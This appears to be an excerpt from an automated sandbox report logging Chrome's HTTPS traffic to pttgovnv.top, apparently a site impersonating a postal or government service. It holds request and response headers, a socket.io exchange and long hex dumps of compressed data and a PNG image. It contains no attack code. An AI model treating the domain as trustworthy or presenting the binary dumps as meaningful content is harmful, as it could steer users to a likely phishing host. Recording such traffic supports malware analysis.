          2024-09-01 22:25:28 UTC1369INData Raw: 81 40 20 10 08 04 22 71 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 08 44 e2 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 88 c4 11 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 20 12 47 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 81 40 24 8e 40 20 10 08 04 02 e1 d8 84 9e ba 80 10 09 83 d9 ac 61 6f 1a f1 51 23 c8 be 26 e2 b0 20 7b 05 c4 7b d0 eb 72 05 a9 e7 08 04 02 81 40 18 39 68 82 41 5a 7b 09 21 e2 06 82 b0 e1 4b 27 3e eb c4 4b 12 b9 a0 8a c4 f9 c4 cb 2f 08 1d 30 32 17 a0 de 24
          Data Ascii: @ "q@ D@ D@ D@ @ @ @ @ #@ #@ #@ G @ G @ G @$@ @$@ @$@ @$@ aoQ#& {{r@9hAZ{!K'>K/02$
          2024-09-01 22:25:28 UTC1369INData Raw: 0d 5e af 97 bd fc 32 e5 db 61 c0 f6 a0 5f 51 64 68 4c 5a 88 26 97 60 f8 90 fe 8f f5 f9 fd f0 f1 e6 2d 5b b6 6e ff fc 61 d1 64 82 b0 26 8e 30 0c 50 f9 97 45 9a 4d 23 7d ce 8c e2 a5 0e 26 40 ad dc e4 f3 cf 3c fd f2 49 93 4a 72 4a cb ca db b0 b1 ac bc fc 2b 36 88 3b 02 00 87 d8 c7 0e 50 4c 9c 08 9e f3 4f 25 04 52 2b e6 57 cd 37 3a d5 ed e1 ff 4b 9f b6 c8 b4 33 78 6d d4 c4 f1 24 d2 59 69 a9 67 9d 7c d2 ca 8c c2 a2 7c f4 d7 bc 71 db 67 db 73 79 7b 56 f6 fc 0d 1b 3f f9 75 69 45 d5 26 f1 5d bf fc dd 64 52 25 10 08 44 e2 08 c7 2a 79 93 8b 64 dc 8e dd 7b 5e 79 ea 99 17 66 63 c3 89 8b 17 9e 3a 63 fa 54 7b 42 82 a3 5f 13 29 b6 7b 7c 8a df 78 52 52 62 bf 81 0d 83 ba 21 76 0e ab d5 0a 67 9c 7a ca 89 8c c4 15 89 e6 03 10 36 a5 12 91 8b 1d 69 03 08 d7 c1 55 97 59 93 24
          Data Ascii: ^2a_QdhLZ&`-[nad&0PEM#}&@<IJrJ+6;PLO%R+W7:K3xm$Yig||qgsy{V?uiE&]dR%D*yd{^yfc:cT{B_){|xRRb!vgz6iUY$
          2024-09-01 22:25:28 UTC1369INData Raw: eb 5f 1e 7f f2 7b 42 7e e2 54 32 84 da 15 bf 48 fe 1b e9 e7 24 7d 9d d4 b9 e9 7c e2 85 1a 95 d0 f3 43 d2 36 26 e5 bf af 48 6b 75 04 76 50 f5 ff ea b1 57 47 6a 47 e6 32 d4 aa 9e 25 f4 21 86 25 0b e6 5d ba 70 de dc b5 b9 79 39 13 ea 1b 9b aa b1 cd 6c 36 27 bc f2 ca eb bf d9 b1 7b ef b3 a0 b8 28 a8 b5 80 a4 8d 23 10 89 23 c4 74 92 d3 c0 e1 65 93 f8 a4 e6 0f f8 5d 2e b7 1b 99 95 d2 aa 32 9b 62 3a 92 f4 b4 54 a5 39 46 0b bb 9e 2d e0 e8 f4 de d2 d6 0e 56 8b 85 df df 85 e7 9c 75 f1 81 83 07 0f 54 d5 36 fc 83 7d b4 ab 0e d7 08 d2 89 19 f8 fd 34 29 f6 1a 57 19 69 aa f6 db b1 8a 3e b3 3b 6c 36 6e 66 bc f2 b2 8b be bb 64 d1 c2 49 13 0a 0b 19 71 d3 72 ff 36 ce e0 c5 3b fa 9d 05 d8 1a d6 d4 ac 10 aa 8c f4 34 ee b7 36 9c 81 4e e8 7e e9 f1 7a 38 91 93 84 ed 68 80 c4 cf
          Data Ascii: _{B~T2H$}|C6&HkuvPWGjG2%!%]py9l6'{(##te].2b:T9F-VuT6}4)Wi>;l6nfdIqr6;46N~z8h
          2024-09-01 22:25:28 UTC1369INData Raw: 6f c0 bf 41 c8 99 d4 d0 78 68 01 1e 13 cf 86 d4 42 9b 05 79 93 24 ce 76 c9 05 e7 fe fe ba 6b af 59 da dc da a2 b0 a9 fa 46 df fa 8f 36 6e 79 f7 fd f5 6f 7f ed fc 73 be 73 e5 e5 5f cf e1 1a 0b 26 77 98 aa 86 91 2f 65 3e 0b 2a 72 e3 f5 7b b9 2c 74 b2 cd 67 55 6d 2d 18 0d 8a 15 62 62 71 51 bf f7 63 66 9b 9f 3a 26 6f 7f 7d fc 89 4f f1 f3 b6 cf b6 bf 58 56 59 fd 5f f6 67 93 98 97 5c aa 39 cb 2b e6 ad 71 37 67 11 c6 86 d6 86 40 20 10 08 04 02 81 70 8c 81 34 71 e3 6f b7 2a ab 34 20 8c cb 97 2c b8 a6 b0 a0 60 f5 84 a2 42 6e 3b 5a 7e e2 e2 ac a4 a4 04 f0 fb fc 7c 57 aa 1e 7f d4 92 35 b7 b4 72 4d 9a 41 f8 80 18 0c 7a 88 b7 c5 f3 6a 0b 01 bf 1f 8c 46 a3 54 a2 f4 d2 da 48 33 5e 55 55 35 24 26 26 f0 04 af 01 a1 4d 09 88 6b a0 c6 c4 e5 72 41 5b bb e2 8a 92 99 91 16 8a
          Data Ascii: oAxhBy$vkYF6nyoss_&w/e>*r{,tgUm-bbqQcf:&o}OXVY_g\9+q7g@ p4qo*4 ,`Bn;Z~|W5rMAzjFTH3^UU5$&&MkrA[
          2024-09-01 22:25:28 UTC1369INData Raw: d7 df 7e a9 a5 a3 e3 63 d6 d4 a6 22 43 66 f1 fb dd aa 1d b0 4f f5 f2 47 92 3b b1 30 07 55 93 2a f4 51 a6 29 52 eb 12 1c 8a d6 a5 0f 13 91 4c ff a2 8e 42 4d 4c 4d 4c 3a e9 8c d3 d7 9c bb 7a e5 f2 45 b3 67 4e 57 18 85 cb 75 58 59 2c 24 d1 d9 d9 59 50 55 53 c3 83 4a 30 58 24 72 dc 70 7c 3a da 79 20 1e 2f a9 96 c8 fb 3f c8 b5 a2 6a 92 a6 65 63 1e 67 b1 30 72 de 3d 32 42 cb ae 87 e9 66 d2 d3 53 b9 09 8c 0f 4e 14 26 61 24 7f 6a 93 2f 96 e7 42 12 5a 57 df 00 71 a2 8c 17 9a 68 a3 25 83 b2 d4 dc b4 a9 53 4e dc b8 e5 b3 a7 40 29 ab 24 37 0a fe 08 f2 26 e7 4d 9d 4a 2e 7c aa 77 be 99 90 64 6e 34 37 0b c7 d0 dc 15 e9 4a a0 57 3d 1b 56 55 fb f4 b5 a7 ac be f6 dc 73 d6 2e e3 9a b8 a2 c2 90 06 37 66 bb 60 8d 26 44 fe 71 53 83 f3 96 ac 25 3c 10 30 9d 0f 26 d5 9e 33 7b d6
          Data Ascii: ~c"CfOG;0U*Q)RLBMLML:zEgNWuXY,$YPUSJ0X$rp|:y /?jecg0r=2BfSN&a$j/BZWqh%SN@)$7&MJ.|wdn47JW=VUs.7f`&DqS%<0&3{
          2024-09-01 22:25:28 UTC1369INData Raw: cb ba 61 90 02 ff 5d da c1 1b 19 d0 df 10 b3 f4 df f1 3f 37 5f 8f 9f 9f 78 fa 85 dc f7 3e dc f0 88 20 64 38 d6 b3 b1 fd a2 0b ce fb c9 c2 f9 f3 b8 ec 9e 71 c6 29 cb 4b cb ca af c1 f6 ff bc bb ee 9d e7 5e 7a ed 41 f6 27 9a f9 ed aa 8d 00 7e d7 13 29 13 7d f8 5f f6 12 f5 91 24 7d aa fb d0 46 6c 0c 41 e5 3b 7a d4 fe a0 7d 9c 5f 3e 0b 32 8d 8e 5c 8b b2 56 2d 5d f4 75 9b cd 9e 3a 6d ea e4 c5 27 cc 9d 95 ab 90 f5 5c fe 5c 68 23 c6 b5 3f 57 91 c1 02 e5 07 e5 cb cd c8 3c 06 76 21 12 1c f6 a8 fd e1 a4 3c 57 d6 54 f3 1a d1 5e af f2 ec d8 d9 b9 30 72 b5 b9 a9 d5 ea b0 5a 57 b7 77 77 3f a3 92 89 b8 c8 39 02 dd 39 88 c8 11 88 c4 1d 5f e4 4d 8e a3 9c 0c 4d 92 80 e4 65 67 5e 3c 63 c6 f4 1c d4 5a f8 fa 20 43 e8 1f 25 35 70 b8 f8 0d 56 43 26 27 2e 7c c9 b9 14 b5 2b 5c 8b
          Data Ascii: a]?7_x> d8q)K^zA'~)}_$}FlA;z}_>2\V-]u:m'\\h#?W<v!<WT^0rZWww?99_MMeg^<cZ C%5pVC&'.|+\
          2024-09-01 22:25:28 UTC1369INData Raw: 72 c2 95 97 5d fc 03 ae a1 98 58 6c d9 ba 7d 67 d3 2f 7e fd c0 d7 41 89 ce 52 a7 f5 c0 89 3c d9 a4 37 14 5f fa f5 0b f8 7d 7f ed bc 73 16 e1 04 99 90 e0 08 e5 6c e2 ac 88 4d 80 d8 8e 0b 7c 57 77 0f 34 35 2a 7e 27 98 78 58 27 c8 4a ff 93 ad 56 ec ae 03 21 12 a4 e1 e6 3c e5 fc 95 55 35 3c c7 18 6a 74 14 73 ad 26 f4 3b fd 6c 31 a9 ad ad 65 8b ba 99 a7 c3 e0 c4 b1 a3 93 4d da 4d d0 d8 d8 0c 4d cd 2d 3c e2 6c fd 87 1b fe f3 df f5 1f fd 5b 68 e9 5c 2a ad 8b 5c d4 e2 c4 58 71 a6 31 6d 72 c9 8a 6f 5f 75 d9 b7 57 30 92 28 f3 ef 0d 76 f1 a8 ad ab e3 c4 06 ab 6a 0c 96 b4 e0 39 1a 45 1f 22 50 0b d1 1f e1 8f 15 81 d3 1b 14 1f 3d 4e 92 d8 a2 86 c4 4c 4d ca 94 71 f6 03 d6 c1 94 69 66 94 f1 d2 32 a2 9e 79 d8 fd 29 e3 a4 90 72 f4 ff 93 e4 36 16 2e 01 38 68 a8 09 42 b9 e3
          Data Ascii: r]Xl}g/~AR<7_}slM|Ww45*~'xX'JV!<U5<jts&;l1eMMM-<l[h\*\Xq1mro_uW0(vj9E"P=NLMqif2y)r6.8hB
          2024-09-01 22:25:28 UTC1369INData Raw: 58 7f a2 b9 34 3d 35 b5 d7 6f 1d 0e c2 39 14 e0 ef c4 d4 17 98 a6 22 25 49 49 eb 82 66 7a ac 4e 52 5e 5e 05 07 4b cb f8 6e e2 d5 d7 df 7a f1 e3 2d 5b 9f 47 62 b4 74 d1 fc 9b d9 b3 7b 29 97 15 7b 3c bc f1 f6 7f 6a fe f7 be df 9f 09 bd eb 03 ab 7d ea d4 25 9b d4 e6 4b 35 89 33 40 38 fa 53 76 32 3a 15 2c 5e b3 6a d9 e9 b5 75 0d 8d 89 09 76 3e 7f ac 5c b9 ec f4 89 45 13 32 bf da b7 bf ae a9 a9 b9 ed c2 0b ce e1 9b af 54 76 ff 1a 9d 92 2e e3 97 f7 3d f8 e6 d6 ad 3b 5e e7 8c af a4 68 1a 3b ae 82 91 8f 03 a0 94 93 f2 a9 88 63 8f ea da f2 fe f0 c1 59 72 f3 75 d7 fe 92 3d ab 7c 03 83 2e 11 f8 ec 49 72 1f ed 3a 84 f2 2a 37 3c 28 af 98 3a 27 da 8d 07 8e 0d 12 b8 2e 36 27 60 3a 1a 2c f7 86 48 66 9b 17 7c 06 91 40 a2 5b 45 8a 48 62 6e e5 b5 a1 03 7d 12 b8 a6 e6 56 b6
          Data Ascii: X4=5o9"%IIfzNR^^Knz-[Gbt{){<j}%K53@8Sv2:,^juv>\E2Tv.=;^h;cYru=|.Ir:*7<(:'.6'`:,Hf|@[EHbn}V
          2024-09-01 22:25:28 UTC1369INData Raw: 68 b3 86 39 2d 75 7a 88 67 9b 13 9d 90 69 dc e4 36 b2 31 63 5b 04 3e 4f 0e 35 d1 30 6a 9a 9f 78 ea b9 3d 0f 3d f2 97 8b 44 53 8b 8a c4 51 70 03 61 e0 79 8b ba 80 40 20 10 08 04 02 e1 d8 03 25 fb 3d 36 21 b5 5a 7c d7 ad 67 40 8d 04 6a d3 74 3a c5 bc 26 0f 0a 6d cf 85 99 55 49 ad a1 e1 7e 5b d5 6c b7 8f 99 d0 e5 0e 53 c9 97 54 cd cd 7b 49 42 fb e3 e7 c5 c5 f5 60 64 bb de 0f 3e 7c 2f f0 d4 73 ff 7e 50 9c b2 52 68 c4 ba 20 ec 6c 0d 42 53 16 84 c3 4b 5a f5 99 1a 41 b4 c9 e4 a1 f2 78 b4 b5 78 20 ac a1 53 3b 49 1b c4 ff 7b 9f 7d e1 25 6e 82 f8 c6 c5 17 fc ea e5 57 de 7c e5 99 e7 5e 4a fe d3 c3 0f f2 84 ac 19 e9 a9 a0 63 f7 6d b7 c7 1f 55 d2 d7 d0 2e 47 a6 23 e0 da 2e 0d 44 63 fe c3 eb d5 d7 37 86 32 bf a3 16 a2 bf cc ef 5c f3 21 aa 58 48 0d 08 96 15 6a 6d 69 03
          Data Ascii: h9-uzgi61c[>O50jx==DSQpay@ %=6!Z|g@jt:&mUI~[lST{IB`d>|/s~PRh lBSKZAxx S;I{}%nW|^JcmU.G#.Dc72\!XHjmi


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          106192.168.2.449851104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC607INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gWous%2FhJKhqGIoYGiTfotWdhkRM41sV%2F%2FQMONGoKMWMs30RAcTSNgi2jK4c%2B2Zf3IEqliG8a4SIFrNfq7AzKtmGHcJS2wTIC4oGhnDdPXT1qMTCNX3uH5wSxuSGbi%2Bg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2c6c6b42d3-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:29 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          107192.168.2.449853104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC361OUTGET /help/layout/images/50.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: image/png
          Content-Length: 30380
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"76ac-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36238
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vK7mv2uJhB%2BRHZl2KUBdy1aHG95LcjIqOtI%2Fx1WNowiWrlkOOrOdR7rCY%2BdU4Sy%2BBJR%2B9OehFMzWqg%2BWoYl17dm8yJrG3LUcnLP7GC7jXwLN1daf50cbkLSxPR8OKRI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2c7c215e79-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 76 39 49 44 41 54 78 da ec 9d 09 7c 15 d5 d9 ff cf cc dd ef cd be 87 04 12 08 fb 4e 02 84 7d 11 10 14 a1 8a 8a ad 56 da 17 fb 6a ab 6f 6d ab 6f b5 d5 f7 5f 6b 5b ed ab 7d b5 d5 b7 da 57 5b 68 a5 6a 5d 91 7d 91 7d 27 40 20 ec 04 08 24 24 21 fb 7e f7 3b f7 ce 7f ce 99 99 9b 9b 3d 81 90 05 7f df 8f 38 e7 de dc 99 39 73 e6 cc cc 6f 9e e7 9c e7 e1 44 51 24 00 00 00 00 00 a0 77 c1 41 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<v9IDATx|N}Vjomo_k[}W[hj]}}'@ $$!~;=89soDQ$wA@8
          2024-09-01 22:25:29 UTC1369INData Raw: 00 00 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00 00 00 00 10 71 00 00 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00 00 00 80 88 03 00 00 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00
          Data Ascii: q""@8 DDqq"@@8 Dq""@88 DD
          2024-09-01 22:25:29 UTC1369INData Raw: aa b5 a4 5a 0c 8e 0c 66 df 4f 4f 4d b0 7e 77 66 ff 7b 02 7f 5b f7 7f 2b 9e a3 4b d7 91 63 06 69 c1 c6 cb 69 fa c6 13 f3 b7 1f f8 0c 2d 09 00 80 88 03 00 80 2e 80 66 61 a0 cb 55 1b cf 4d d5 ea e4 db 93 ce 62 24 62 b8 99 95 7f 76 e7 a0 61 53 06 87 17 aa bf 77 ac fe 6a a1 7b e7 ae 97 95 8f 1c c7 c9 6e 57 4d bf c4 b3 68 4d 00 c0 ed 0e dc a9 00 00 00 00 00 bd 90 2e b5 c4 59 57 fe f3 49 cf 89 53 cb e4 0f d6 b8 7a 29 c9 09 01 3f a3 ee 10 ae 83 9b 6e 71 1d d1 eb d3 12 bd ce c9 5e d3 4d a6 72 d3 bd f7 3c 46 cb c6 d9 33 b2 7b da c9 a8 7b 6f c5 73 52 fb 3c cc ea ea 72 87 75 45 fb 10 9f a8 0d 6c 2b f3 43 f7 b1 c1 e2 c6 85 0b 0e 74 b4 fe 55 3f fe f9 61 b1 a2 7c 88 d2 d6 15 37 54 9f 8e 1e 98 c7 63 e1 a3 22 cf 6a 47 8e 58 4d 3f 07 2d 7f f4 dd 9e 7a b1 b1 f6 a9 ac 60 c9
          Data Ascii: ZfOOM~wf{[+Kcii-.faUMb$bvaSwj{nWMhM.YWISz)?nq^Mr<F3{{osR<ruEl+CtU?a|7Tc"jGXM?-z`
          2024-09-01 22:25:29 UTC1369INData Raw: 9c 4a 8b d9 91 fa 87 4b 98 cc 44 93 18 ef 1f 9f 96 95 6f 65 ae a5 2a ab 93 09 0a 5e fd 5d ab 22 4e 6e 37 fa 2c 15 c5 fa 36 a4 e2 4c c5 1b f8 3d 2d 07 fc 8d ae c8 b9 3c ac 78 d1 e9 21 39 b5 8e e5 b4 bc ff 4a e5 f2 c4 50 23 13 96 e9 29 e1 ef fe 60 56 f2 db b7 f3 83 c5 ed f6 30 17 a1 cd 66 7f bc b6 d6 2a ca ed ce 8f 14 04 c1 d0 f6 ba ee 20 5b 5d 1d 1b 1b a9 91 fa 84 4e ab 65 43 3c 1c 76 7b 03 21 e3 72 b9 83 24 21 f4 0c db 4f 5d 9d f4 ae 2e cb 79 a7 d3 19 d4 d1 fa ba 9c 6e 8b d5 6a 63 c3 0e ac 75 75 c4 66 b7 b7 6b 9c a3 b4 af 50 79 1d eb 10 a9 1f 0e 71 38 9d 33 58 1f 11 bc 1f 04 fe ee c3 8f 3f 61 63 9d af 5e cd 9b 53 5a 56 b6 84 f5 5f 41 20 16 b3 d4 67 b5 3a a2 ac 23 ed 57 7e c9 93 84 d7 fc aa 6a d9 de 30 74 d8 50 3a 04 a2 45 11 e7 55 da b4 ba ba 76 4e e0 75
          Data Ascii: JKDoe*^]"Nn7,6L=-<x!9JP#)`V0f* []NeC<v{!r$!O].ynjcuufkPyq83X?ac^SZV_A g:#W~j0tP:EUvNu
          2024-09-01 22:25:29 UTC1369INData Raw: 9e 86 4c 89 db bf ff 00 9b 34 31 2d 60 dc 28 e8 fd c0 9d 0a 00 00 00 00 d0 0b 81 25 0e 00 d0 e9 50 17 2a b5 c0 d1 b2 b7 b8 a6 de 85 4a 6f 3a 4a 56 06 8d c5 40 16 8f 8e 65 11 f8 ff 7d 76 ff 37 1b 6f c3 b9 5e 8e da ef 3e 7c 2c a9 a5 fd 18 86 0f 25 fa b1 a3 3f 6e fc 7d 61 a5 23 4d e3 92 8d 21 2e 9f d8 46 80 df ae 87 6b 94 c7 55 75 af d6 55 d9 c8 a1 33 a5 2c 48 b1 5e ab d9 2f fd 6c 1a 2d cf 1c 02 8b 5c 6f 40 14 95 60 d5 7c 7d 88 91 a8 c8 c8 ec c8 c8 a8 1d ac 4f 3b 9c 73 ea 6a e5 80 be 6e 97 eb 49 9f d7 a7 ad b3 d6 c5 d2 cf c9 fd fa ed 4d 4f 9f d8 a1 ac 1e 2e b7 3b c8 a7 58 b6 69 9e f0 a0 60 79 a6 b6 db e9 24 a2 cf a7 76 36 ea ba 5d 76 2e 3b 9b 85 df 99 36 6d ea 9b 38 53 10 71 00 00 d0 2c 74 26 2a 1d 03 a7 ba 50 99 80 53 34 0b 8d 4a 6f 08 91 87 e7 a4 0e 8c 24
          Data Ascii: L41-`(%P*Jo:JV@e}v7o^>|,%?n}a#M!.FkUuU3,H^/l-\o@`|}O;sjnIMO.;Xi`y$v6]v.;6m8Sq,t&*PS4Jo$
          2024-09-01 22:25:29 UTC1369INData Raw: 86 5e 6f 14 3e 40 e4 3a 38 12 b9 b5 75 c4 5e d5 0f 45 6f 2f 6f 1f ae b9 3a 77 a4 3e 1d 38 a6 5e fa 82 de ad ed d3 29 83 c3 5e 59 97 fd 1e 5d 7e be 2b 67 96 c3 2a 6b 28 9d 4e db 44 88 a8 e3 e2 e6 0d 8c ac 7e 7c 76 f2 f4 d6 b6 69 ff e8 d3 65 ae 8c cc 70 9f d7 1d 20 dc 9a 3f 16 be 5f df 33 74 69 bc 77 71 93 04 e1 15 36 f7 50 ba 14 1c 6e 8e 5a 23 d8 b6 3a 30 26 4e 15 62 5c 07 02 cb dd c8 3a ed ed 2e 1c 2f 1f bc e0 f5 71 2e 87 dc 36 3b 2f 94 3d 3b 32 31 e4 5f 0b 46 c5 64 f6 d4 8e ee 13 c5 c0 3e 27 d6 1f 50 db 4d c4 71 2c c6 1a a7 9e 7d 5e 39 8f 06 83 be ba 3d d7 16 09 c8 96 70 a3 d7 27 df fe 6b 85 6b b0 e4 e4 03 57 44 61 87 98 3d 6b 46 76 6e 5e de 29 45 c4 71 aa 05 b9 d6 5a f7 72 d1 f5 eb b2 68 4f 4b dd 51 53 5b 93 24 2a 01 e9 e8 b5 a1 37 18 d8 c4 87 b0 b0 b0
          Data Ascii: ^o>@:8u^Eo/o:w>8^)^Y]~+g*k(ND~|viep ?_3tiwq6PnZ#:0&Nb\:./q.6;/=;21_Fd>'PMq,}^9=p'kkWDa=kFvn^)EqZrhOKQS[$*7
          2024-09-01 22:25:29 UTC1369INData Raw: 5e a0 9f ab aa ab 5f d0 6a b5 cd b6 a7 db 2d 4f b8 89 8c 88 78 75 c2 f8 b4 17 71 c7 84 88 03 00 f4 10 9e f9 f8 f4 f6 0f 32 ae dd c1 7b 95 b1 59 9a e6 8d f7 54 c0 f9 ec 2e 56 9e 3c 71 a0 f0 e2 e2 61 d1 2d 6d d3 93 71 94 3d 40 9c 5f ac 7f 46 28 2e 6c d7 34 63 4e 23 8f 07 33 dd bf e8 31 e3 5d f3 9b 0d af b1 64 42 c2 46 e9 9f a9 33 8e 7b db 99 b2 31 db ce 96 bc f2 69 56 11 73 a9 d9 af 56 f8 c7 28 f1 52 1b 68 75 dd 77 eb a4 fb 37 39 3d e4 d3 23 05 6c 96 70 64 90 3e 67 71 6a fc 8e 9e d8 7f c2 42 c3 f2 2c 16 0b 3b 5f 2e a7 6b 9a 2a 04 24 a1 36 f5 37 bf 7b f5 03 59 93 6a 04 8f 57 30 da ad 76 26 9a 9c 4e c7 fc 7a bd ca 9f 0d 0d 0b 2b 68 6e db f4 7c 88 ca 8b 43 c0 6c 58 62 b3 d9 89 c3 e1 6c 5e 9c 4b a2 d0 6c 36 b3 72 78 58 58 83 f1 6c 41 c1 96 12 ba ac b3 5a 25 61
          Data Ascii: ^_j-Oxuq2{YT.V<qa-mq=@_F(.l4cN#31]dBF3{1iVsV(Rhuw79=#lpd>gqjB,;_.k*$67{YjW0v&Nz+hn|ClXbl^Kl6rxXXlAZ%a
          2024-09-01 22:25:29 UTC1369INData Raw: fe f9 45 76 67 d6 f5 d1 47 1f a1 fd ad d3 fa 9c 1a ca 44 5a be 7e 23 eb cf 9a 35 4b c9 b7 3a eb a5 1b ad c3 8f ff e3 a9 36 d7 fd de b2 47 d5 58 73 2b 71 e7 ec 5d ef e8 00 00 00 00 00 a0 17 d1 d5 6f 70 22 e9 dd 09 de 6f 31 2c d4 78 6f 6e 9f ee 4e f0 de d3 b9 85 ed 53 1f 9c 23 70 db 1c af 25 ba 51 c3 99 9b 48 3f 3e b5 45 6b c5 1f 36 5d fa 9f 55 19 f9 77 d0 b2 a7 a4 56 d4 06 24 8f a7 6e c2 e6 92 bb d3 7c a9 33 86 c7 30 eb d4 b2 69 49 0b 5b da b6 fb 44 56 90 ed 33 79 1c 9c 37 27 4f 6c 5c ef b6 8e 57 37 62 70 8e e9 9e 85 4f f5 94 93 38 75 50 78 9e 5e cb 7d 9b 96 77 65 97 97 e6 28 96 b8 e6 da a8 d3 3a 4e 73 db 56 72 61 56 db dc fd f0 28 03 00 22 ae 4b 54 0a e9 dd 09 de 6f f5 33 de db cb db a7 bb 13 bc f7 78 95 7e ab da 47 6c d4 22 54 bc 51 0c 63 46 12 d3 5d 73
          Data Ascii: EvgGDZ~#5K:6GXs+q]op"o1,xonNS#p%QH?>Ek6]UwV$n|30iI[DV3y7'Ol\W7bpO8uPx^}we(:NsVraV("KTo3x~Gl"TQcF]s
          2024-09-01 22:25:29 UTC1369INData Raw: dd fa 06 2d 6b 34 da 99 21 a1 21 2c 8f e7 89 ac 93 07 02 72 7b 92 dd bb f7 0e 39 79 ea d4 a3 b4 7c ed 5a fe 34 8e 97 43 d1 54 55 d7 bc b8 60 fe dc 8c ce 3a 96 dd bb 76 0f 59 b7 61 d3 7b b4 6c 30 1a 66 fa 7c e2 46 5a de be 6b 67 de 2f 9f ff 79 87 32 89 bc ff b7 15 cf 5c cb cb 9f 4a cb 1e 41 58 22 d0 bc c6 ea 5b 93 a4 42 b5 1a 75 8c 2a b7 71 dd fa 4d 2c 2e cf ac 19 d3 5f 8d 88 8a ca 96 eb b2 eb e5 ca aa aa 14 e9 58 17 aa d7 6a bb de 91 7c 3e ce eb f3 b1 bc b5 b9 f9 d7 de 8f 8b 89 61 c1 b9 f7 ee df ff 42 55 65 d5 72 e5 d8 fc e3 2c 95 b7 2a ce e9 90 87 5e c4 c7 c7 bd 5d 5e 5e ce 32 be cc 9e 3d f3 ac ba e1 ff fd f3 3b 2f 17 14 16 a5 b1 fb 8b 54 27 7a df 60 b3 d9 9b b2 ee f3 2f bf 62 e7 67 